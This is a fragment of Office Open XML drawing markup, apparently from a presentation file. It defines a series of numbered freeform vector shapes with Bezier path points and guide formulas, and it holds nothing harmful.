                  <a:cubicBezTo>
                    <a:pt x="11" y="219"/>
                    <a:pt x="0" y="227"/>
                    <a:pt x="0" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="287"/>
                    <a:pt x="48" y="316"/>
                    <a:pt x="110" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="316"/>
                    <a:pt x="218" y="270"/>
                    <a:pt x="218" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218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0" name="Freeform 241">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C4CDDA-D8DF-4CA1-9E97-96E92DD24E05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356100" y="2051050"/>
              <a:ext cx="66675" cy="203200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 173 w 194"/>
                <a:gd name="T1" fmla="*/ 487 h 499"/>
                <a:gd name="T2" fmla="*/ 184 w 194"/>
                <a:gd name="T3" fmla="*/ 499 h 499"/>
                <a:gd name="T4" fmla="*/ 194 w 194"/>
                <a:gd name="T5" fmla="*/ 489 h 499"/>
                <a:gd name="T6" fmla="*/ 192 w 194"/>
                <a:gd name="T7" fmla="*/ 481 h 499"/>
                <a:gd name="T8" fmla="*/ 21 w 194"/>
                <a:gd name="T9" fmla="*/ 12 h 499"/>
                <a:gd name="T10" fmla="*/ 10 w 194"/>
                <a:gd name="T11" fmla="*/ 0 h 499"/>
                <a:gd name="T12" fmla="*/ 0 w 194"/>
                <a:gd name="T13" fmla="*/ 10 h 499"/>
                <a:gd name="T14" fmla="*/ 3 w 194"/>
                <a:gd name="T15" fmla="*/ 18 h 499"/>
                <a:gd name="T16" fmla="*/ 173 w 194"/>
                <a:gd name="T17" fmla="*/ 48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9">
                  <a:moveTo>
                    <a:pt x="173" y="487"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="494"/>
                    <a:pt x="178" y="499"/>
                    <a:pt x="184" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="499"/>
                    <a:pt x="194" y="494"/>
                    <a:pt x="194" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="488"/>
                    <a:pt x="194" y="487"/>
                    <a:pt x="192" y="481"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="12"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="4"/>
                    <a:pt x="17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73" y="4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1" name="Freeform 242">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB90E39-0DBC-41D1-B0B1-FD715B8F7BDC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437062" y="2116138"/>
              <a:ext cx="80963" cy="87313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7 w 234"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 227 w 234"/>
                <a:gd name="T7" fmla="*/ 16 h 215"/>
                <a:gd name="T8" fmla="*/ 207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4 w 234"/>
                <a:gd name="T31" fmla="*/ 31 h 215"/>
                <a:gd name="T32" fmla="*/ 102 w 234"/>
                <a:gd name="T33" fmla="*/ 105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7" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="31"/>
                    <a:pt x="227" y="31"/>
                    <a:pt x="227" y="16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90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4" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="105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7" y="215"/>
                    <a:pt x="99" y="215"/>
                    <a:pt x="99" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="185"/>
                    <a:pt x="89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2" name="Freeform 243">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064F1492-E91C-4D98-AB99-F37F528EB836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529137" y="2078038"/>
              <a:ext cx="68263" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 106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6 w 197"/>
                <a:gd name="T9" fmla="*/ 92 h 307"/>
                <a:gd name="T10" fmla="*/ 106 w 197"/>
                <a:gd name="T11" fmla="*/ 69 h 307"/>
                <a:gd name="T12" fmla="*/ 154 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 176 w 197"/>
                <a:gd name="T15" fmla="*/ 51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1 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 21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1 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 21 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 156 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 156 w 197"/>
                <a:gd name="T45" fmla="*/ 277 h 307"/>
                <a:gd name="T46" fmla="*/ 106 w 197"/>
                <a:gd name="T47" fmla="*/ 277 h 307"/>
                <a:gd name="T48" fmla="*/ 106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6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6" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="69"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="30"/>
                    <a:pt x="139" y="30"/>
                    <a:pt x="154" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="32"/>
                    <a:pt x="158" y="51"/>
                    <a:pt x="176" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="51"/>
                    <a:pt x="197" y="43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1" y="92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1" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156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6" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106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3" name="Freeform 244">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7EDFBF0-A3F2-41FA-A0B4-85AED2748EE0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619625" y="2078038"/>
              <a:ext cx="68263" cy="125413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3 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 197"/>
                <a:gd name="T15" fmla="*/ 51 h 307"/>
                <a:gd name="T16" fmla="*/ 197 w 197"/>
                <a:gd name="T17" fmla="*/ 30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0 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 20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0 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 155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1"/>
                    <a:pt x="175" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="51"/>
                    <a:pt x="197" y="43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0" y="92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0" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155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4" name="Freeform 245">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE2E387-63CC-4DFF-8675-BC42141B86E5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711700" y="2051050"/>
              <a:ext cx="68263" cy="203200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 194"/>
                <a:gd name="T1" fmla="*/ 487 h 499"/>
                <a:gd name="T2" fmla="*/ 184 w 194"/>
                <a:gd name="T3" fmla="*/ 499 h 499"/>
                <a:gd name="T4" fmla="*/ 194 w 194"/>
                <a:gd name="T5" fmla="*/ 489 h 499"/>
                <a:gd name="T6" fmla="*/ 191 w 194"/>
                <a:gd name="T7" fmla="*/ 481 h 499"/>
                <a:gd name="T8" fmla="*/ 21 w 194"/>
                <a:gd name="T9" fmla="*/ 12 h 499"/>
                <a:gd name="T10" fmla="*/ 10 w 194"/>
                <a:gd name="T11" fmla="*/ 0 h 499"/>
                <a:gd name="T12" fmla="*/ 0 w 194"/>
                <a:gd name="T13" fmla="*/ 10 h 499"/>
                <a:gd name="T14" fmla="*/ 2 w 194"/>
                <a:gd name="T15" fmla="*/ 18 h 499"/>
                <a:gd name="T16" fmla="*/ 172 w 194"/>
                <a:gd name="T17" fmla="*/ 48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9">
                  <a:moveTo>
                    <a:pt x="172" y="487"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="494"/>
                    <a:pt x="177" y="499"/>
                    <a:pt x="184" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="499"/>
                    <a:pt x="194" y="494"/>
                    <a:pt x="194" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="488"/>
                    <a:pt x="194" y="487"/>
                    <a:pt x="191" y="481"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="12"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="4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2" y="18"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="4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5" name="Freeform 246">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4B097E7-B743-4BD9-B5CD-1B81CF1AB033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792662" y="2116138"/>
              <a:ext cx="80963" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 130 w 234"/>
                <a:gd name="T1" fmla="*/ 105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6" name="Freeform 247">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D9F028-200D-4082-ABCC-212A5C619754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4881562" y="2079625"/>
              <a:ext cx="80963" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 111 h 307"/>
                <a:gd name="T2" fmla="*/ 77 w 237"/>
                <a:gd name="T3" fmla="*/ 20 h 307"/>
                <a:gd name="T4" fmla="*/ 57 w 237"/>
                <a:gd name="T5" fmla="*/ 0 h 307"/>
                <a:gd name="T6" fmla="*/ 20 w 237"/>
                <a:gd name="T7" fmla="*/ 0 h 307"/>
                <a:gd name="T8" fmla="*/ 0 w 237"/>
                <a:gd name="T9" fmla="*/ 15 h 307"/>
                <a:gd name="T10" fmla="*/ 20 w 237"/>
                <a:gd name="T11" fmla="*/ 30 h 307"/>
                <a:gd name="T12" fmla="*/ 42 w 237"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 42 w 237"/>
                <a:gd name="T15" fmla="*/ 284 h 307"/>
                <a:gd name="T16" fmla="*/ 60 w 237"/>
                <a:gd name="T17" fmla="*/ 304 h 307"/>
                <a:gd name="T18" fmla="*/ 77 w 237"/>
                <a:gd name="T19" fmla="*/ 282 h 307"/>
                <a:gd name="T20" fmla="*/ 135 w 237"/>
                <a:gd name="T21" fmla="*/ 307 h 307"/>
                <a:gd name="T22" fmla="*/ 237 w 237"/>
                <a:gd name="T23" fmla="*/ 197 h 307"/>
                <a:gd name="T24" fmla="*/ 140 w 237"/>
                <a:gd name="T25" fmla="*/ 86 h 307"/>
                <a:gd name="T26" fmla="*/ 77 w 237"/>
                <a:gd name="T27" fmla="*/ 111 h 307"/>
                <a:gd name="T28" fmla="*/ 77 w 237"/>
                <a:gd name="T29" fmla="*/ 209 h 307"/>
                <a:gd name="T30" fmla="*/ 77 w 237"/>
                <a:gd name="T31" fmla="*/ 173 h 307"/>
                <a:gd name="T32" fmla="*/ 137 w 237"/>
                <a:gd name="T33" fmla="*/ 117 h 307"/>
                <a:gd name="T34" fmla="*/ 203 w 237"/>
                <a:gd name="T35" fmla="*/ 197 h 307"/>
                <a:gd name="T36" fmla="*/ 133 w 237"/>
                <a:gd name="T37" fmla="*/ 277 h 307"/>
                <a:gd name="T38" fmla="*/ 77 w 237"/>
                <a:gd name="T39" fmla="*/ 20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77" y="111"/>
                  </a:move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4"/>
                    <a:pt x="60" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="304"/>
                    <a:pt x="77" y="294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7" y="260"/>
                    <a:pt x="237" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="135"/>
                    <a:pt x="193" y="86"/>
                    <a:pt x="140" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="86"/>
                    <a:pt x="94" y="95"/>
                    <a:pt x="77" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="209"/>
                  </a:move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  <a:cubicBezTo>
                    <a:pt x="203" y="244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7" name="Freeform 248">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F13141-E76C-4822-928D-A7F0C3482403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4976812" y="2078038"/>
              <a:ext cx="66675" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 106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6 w 197"/>
                <a:gd name="T9" fmla="*/ 92 h 307"/>
                <a:gd name="T10" fmla="*/ 106 w 197"/>
                <a:gd name="T11" fmla="*/ 69 h 307"/>
                <a:gd name="T12" fmla="*/ 154 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 176 w 197"/>
                <a:gd name="T15" fmla="*/ 51 h 307"/>
                <a:gd name="T16" fmla="*/ 197 w 197"/>
                <a:gd name="T17" fmla="*/ 30 h 307"/>
                <a:gd name="T18" fmla="*/ 150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1 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 21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1 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 21 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 156 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 156 w 197"/>
                <a:gd name="T45" fmla="*/ 277 h 307"/>
                <a:gd name="T46" fmla="*/ 106 w 197"/>
                <a:gd name="T47" fmla="*/ 277 h 307"/>
                <a:gd name="T48" fmla="*/ 106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6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6" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="69"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="30"/>
                    <a:pt x="139" y="30"/>
                    <a:pt x="154" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="32"/>
                    <a:pt x="159" y="51"/>
                    <a:pt x="176" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="51"/>
                    <a:pt x="197" y="43"/>
                    <a:pt x="197" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="0"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="150" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110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1" y="92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1" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156" y="307"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="307"/>
                    <a:pt x="176" y="307"/>
                    <a:pt x="176" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="277"/>
                    <a:pt x="164" y="277"/>
                    <a:pt x="156" y="277"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106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8" name="Freeform 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF56BD0E-D26D-4A0A-AEA0-7C4AAFCCE42F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089525" y="2079625"/>
              <a:ext cx="28575" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 80 w 80"/>
                <a:gd name="T1" fmla="*/ 56 h 154"/>
                <a:gd name="T2" fmla="*/ 41 w 80"/>
                <a:gd name="T3" fmla="*/ 0 h 154"/>
                <a:gd name="T4" fmla="*/ 16 w 80"/>
                <a:gd name="T5" fmla="*/ 25 h 154"/>
                <a:gd name="T6" fmla="*/ 41 w 80"/>
                <a:gd name="T7" fmla="*/ 49 h 154"/>
                <a:gd name="T8" fmla="*/ 48 w 80"/>
                <a:gd name="T9" fmla="*/ 49 h 154"/>
                <a:gd name="T10" fmla="*/ 50 w 80"/>
                <a:gd name="T11" fmla="*/ 56 h 154"/>
                <a:gd name="T12" fmla="*/ 9 w 80"/>
                <a:gd name="T13" fmla="*/ 125 h 154"/>
                <a:gd name="T14" fmla="*/ 0 w 80"/>
                <a:gd name="T15" fmla="*/ 138 h 154"/>
                <a:gd name="T16" fmla="*/ 15 w 80"/>
                <a:gd name="T17" fmla="*/ 154 h 154"/>
                <a:gd name="T18" fmla="*/ 80 w 80"/>
                <a:gd name="T19" fmla="*/ 5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80" y="56"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="18"/>
                    <a:pt x="62" y="0"/>
                    <a:pt x="41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8"/>
                    <a:pt x="26" y="49"/>
                    <a:pt x="41" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="49"/>
                    <a:pt x="47" y="49"/>
                    <a:pt x="48" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="49"/>
                    <a:pt x="50" y="53"/>
                    <a:pt x="50" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="66"/>
                    <a:pt x="48" y="102"/>
                    <a:pt x="9" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="127"/>
                    <a:pt x="0" y="130"/>
                    <a:pt x="0" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="147"/>
                    <a:pt x="8" y="154"/>
                    <a:pt x="15" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="154"/>
                    <a:pt x="80" y="119"/>
                    <a:pt x="80" y="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9" name="Freeform 250">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13B2F1BB-5A71-4B68-B282-2C7630CAF5EB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180012" y="2079625"/>
              <a:ext cx="28575" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 81 w 81"/>
                <a:gd name="T1" fmla="*/ 56 h 154"/>
                <a:gd name="T2" fmla="*/ 42 w 81"/>
                <a:gd name="T3" fmla="*/ 0 h 154"/>
                <a:gd name="T4" fmla="*/ 16 w 81"/>
                <a:gd name="T5" fmla="*/ 25 h 154"/>
                <a:gd name="T6" fmla="*/ 41 w 81"/>
                <a:gd name="T7" fmla="*/ 49 h 154"/>
                <a:gd name="T8" fmla="*/ 48 w 81"/>
                <a:gd name="T9" fmla="*/ 49 h 154"/>
                <a:gd name="T10" fmla="*/ 50 w 81"/>
                <a:gd name="T11" fmla="*/ 56 h 154"/>
                <a:gd name="T12" fmla="*/ 9 w 81"/>
                <a:gd name="T13" fmla="*/ 125 h 154"/>
                <a:gd name="T14" fmla="*/ 0 w 81"/>
                <a:gd name="T15" fmla="*/ 138 h 154"/>
                <a:gd name="T16" fmla="*/ 16 w 81"/>
                <a:gd name="T17" fmla="*/ 154 h 154"/>
                <a:gd name="T18" fmla="*/ 81 w 81"/>
                <a:gd name="T19" fmla="*/ 5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54">
                  <a:moveTo>
                    <a:pt x="81" y="56"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="18"/>
                    <a:pt x="62" y="0"/>
                    <a:pt x="42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8"/>
                    <a:pt x="26" y="49"/>
                    <a:pt x="41" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="49"/>
                    <a:pt x="47" y="49"/>
                    <a:pt x="48" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="49"/>
                    <a:pt x="50" y="53"/>
                    <a:pt x="50" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="66"/>
                    <a:pt x="49" y="102"/>
                    <a:pt x="9" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="127"/>
                    <a:pt x="0" y="130"/>
                    <a:pt x="0" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="147"/>
                    <a:pt x="9" y="154"/>
                    <a:pt x="16" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="154"/>
                    <a:pt x="81" y="119"/>
                    <a:pt x="81" y="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0" name="Freeform 251">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B614C3EA-4742-467A-BDAC-AB2F504BACC1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254625" y="2062163"/>
              <a:ext cx="46038" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 132"/>
                <a:gd name="T1" fmla="*/ 194 h 387"/>
                <a:gd name="T2" fmla="*/ 91 w 132"/>
                <a:gd name="T3" fmla="*/ 65 h 387"/>
                <a:gd name="T4" fmla="*/ 15 w 132"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 132"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 8 w 132"/>
                <a:gd name="T9" fmla="*/ 27 h 387"/>
                <a:gd name="T10" fmla="*/ 97 w 132"/>
                <a:gd name="T11" fmla="*/ 194 h 387"/>
                <a:gd name="T12" fmla="*/ 11 w 132"/>
                <a:gd name="T13" fmla="*/ 358 h 387"/>
                <a:gd name="T14" fmla="*/ 0 w 132"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 15 w 132"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 132 w 132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4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="134"/>
                    <a:pt x="109" y="89"/>
                    <a:pt x="91" y="65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2"/>
                    <a:pt x="5" y="25"/>
                    <a:pt x="8" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="81"/>
                    <a:pt x="97" y="161"/>
                    <a:pt x="97" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="244"/>
                    <a:pt x="79" y="313"/>
                    <a:pt x="11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2" y="321"/>
                    <a:pt x="132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1" name="Freeform 252">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC701432-6957-4B33-80EB-8E7C068659B4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5364162" y="2178050"/>
              <a:ext cx="22225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2" name="Freeform 253">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E75B35B-DCDB-415E-A9BF-636E0D8BD66D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5426075" y="2062163"/>
              <a:ext cx="77788" cy="158750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8 w 226"/>
                <a:gd name="T9" fmla="*/ 359 h 388"/>
                <a:gd name="T10" fmla="*/ 25 w 226"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 43 w 226"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 60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39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7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6 w 226"/>
                <a:gd name="T39" fmla="*/ 67 h 388"/>
                <a:gd name="T40" fmla="*/ 43 w 226"/>
                <a:gd name="T41" fmla="*/ 0 h 388"/>
                <a:gd name="T42" fmla="*/ 0 w 226"/>
                <a:gd name="T43" fmla="*/ 67 h 388"/>
                <a:gd name="T44" fmla="*/ 43 w 226"/>
                <a:gd name="T45" fmla="*/ 133 h 388"/>
                <a:gd name="T46" fmla="*/ 86 w 226"/>
                <a:gd name="T47" fmla="*/ 67 h 388"/>
                <a:gd name="T48" fmla="*/ 43 w 226"/>
                <a:gd name="T49" fmla="*/ 102 h 388"/>
                <a:gd name="T50" fmla="*/ 27 w 226"/>
                <a:gd name="T51" fmla="*/ 67 h 388"/>
                <a:gd name="T52" fmla="*/ 43 w 226"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 58 w 226"/>
                <a:gd name="T55" fmla="*/ 67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7" y="10"/>
                    <a:pt x="165" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="359"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="364"/>
                    <a:pt x="25" y="367"/>
                    <a:pt x="25" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="380"/>
                    <a:pt x="33" y="388"/>
                    <a:pt x="43" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="388"/>
                    <a:pt x="58" y="379"/>
                    <a:pt x="60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7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8"/>
                    <a:pt x="183" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207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6" y="67"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="28"/>
                    <a:pt x="67" y="0"/>
                    <a:pt x="43" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="0" y="29"/>
                    <a:pt x="0" y="67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7" y="133"/>
                    <a:pt x="86" y="104"/>
                    <a:pt x="86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7" y="88"/>
                    <a:pt x="27" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="46"/>
                    <a:pt x="36" y="31"/>
                    <a:pt x="43" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="31"/>
                    <a:pt x="58" y="46"/>
                    <a:pt x="58" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58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3" name="Freeform 254">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{762D5318-AD6D-4C64-914D-02F4461A92CD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514975" y="2116138"/>
              <a:ext cx="80963" cy="87313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4" name="Freeform 255">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03AF084E-99E8-44F0-83DA-19CA5B0336DC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634037" y="2178050"/>
              <a:ext cx="22225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5" name="Freeform 256">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D2C29AB-2764-4FF8-8228-957C40BABE80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695950" y="2062163"/>
              <a:ext cx="77788" cy="158750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198 w 226"/>
                <a:gd name="T1" fmla="*/ 29 h 388"/>
                <a:gd name="T2" fmla="*/ 201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8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40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8 w 226"/>
                <a:gd name="T31" fmla="*/ 321 h 388"/>
                <a:gd name="T32" fmla="*/ 183 w 226"/>
